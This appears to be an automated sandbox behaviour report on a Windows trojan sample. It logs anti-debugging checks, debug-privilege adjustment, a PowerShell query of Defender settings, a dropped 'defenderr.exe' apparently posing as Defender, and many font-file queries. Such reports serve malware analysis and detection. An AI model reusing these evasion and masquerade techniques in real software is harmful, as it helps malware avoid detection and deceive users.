Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Code function: 11_2_00007FFBAC18E27D CheckRemoteDebuggerPresent,

11_2_00007FFBAC18E27D

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-MpPreference -verbose	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process created: C:\ProgramData\Microsoft\MyClient\defenderr.exe "C:\ProgramData\Microsoft\MyClient\defenderr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process created: C:\ProgramData\Microsoft\MyClient\defenderr.exe "C:\ProgramData\Microsoft\MyClient\defenderr.exe"

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
